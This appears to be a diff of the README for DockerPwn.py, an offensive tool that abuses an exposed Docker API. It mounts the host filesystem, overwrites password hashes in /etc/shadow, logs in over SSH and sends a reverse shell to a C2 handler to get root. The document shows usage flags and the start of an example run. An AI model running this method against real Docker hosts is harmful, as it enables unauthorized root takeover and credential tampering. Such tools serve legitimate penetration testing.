AbsoZed/DockerPwn.py/README.md

 This will automatically create a container on the Docker host with the host's root filesystem mounted, allowing arbitrary read and write of the host filesystem (which is bad).

-Once created, the script will empty the password requirement for 'root', and will alter any user with a valid Unix password to have a password of 'DockerPwn'
+Once created, the script will employ the method of your choosing for obtaining a root shell.
+Currently, only shadow is working - this alters root's hash in /etc/shadow to reflect a password of 'DockerPwn', as well as any other user with a valid SHA512 Unix hash in /etc/shadow.

-Once this is done, the script will attempt to use Paramiko to login to all users enumerated from /etc/passwd using the password 'DockerPwn', and a shell will be spawned.
+Once this is done, the script will attempt to use Paramiko to login to all users enumerated from /etc/passwd using the password 'DockerPwn'.
+Once a valid login is discovered, a reverse shell will be sent to the built-in handler using /bin/bash.
+The built-in handler will then automatically obtain a PTY, escalate to root, and clear the screen.

+Shell I/O is logged for convenience and output to ./DockerPwn.log

 ## Roadmap:

-Utilize the limited command execution via Paramiko to get a better shell, and automatically escalate to root.
+Implement chroot method, bin method for quieter operation.

 ## Usage:
 ```
-DockerPwn.py [-h] [--target TARGET] [--port PORT]
+DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2]

 optional arguments:
   -h, --help       show this help message and exit
   --target TARGET  IP of Docker Host
   --port PORT      Docker API TCP Port
+  --image IMAGE    Docker image to use.
+Default is Alpine Linux.
+  --method METHOD  Method to use.
+Valid methods are shadow, chroot, binary.
+Default is shadow.
+  --c2 C2          Local IP and port in [IP]:[PORT] format to receive the shell.
  ```
 ## Example Output:

 ```
-Dylans-MacBook-Pro:~ dylan$ /usr/local/bin/python3 /Users/dylan/Documents/DockerPwn.py --target 192.168.0.20 --port 2375
+Dylans-MacBook-Pro:DockerPwn.py dylan$ /usr/local/bin/python3 /Users/dylan/Documents/GitHub/DockerPwn.py/DockerPwn.py --target 192.168.0.21 --port 2375 --c2 192.168.0.17:8080

 [+] Successfully probed the API.
 Writing out list of containers just in case there's something cool.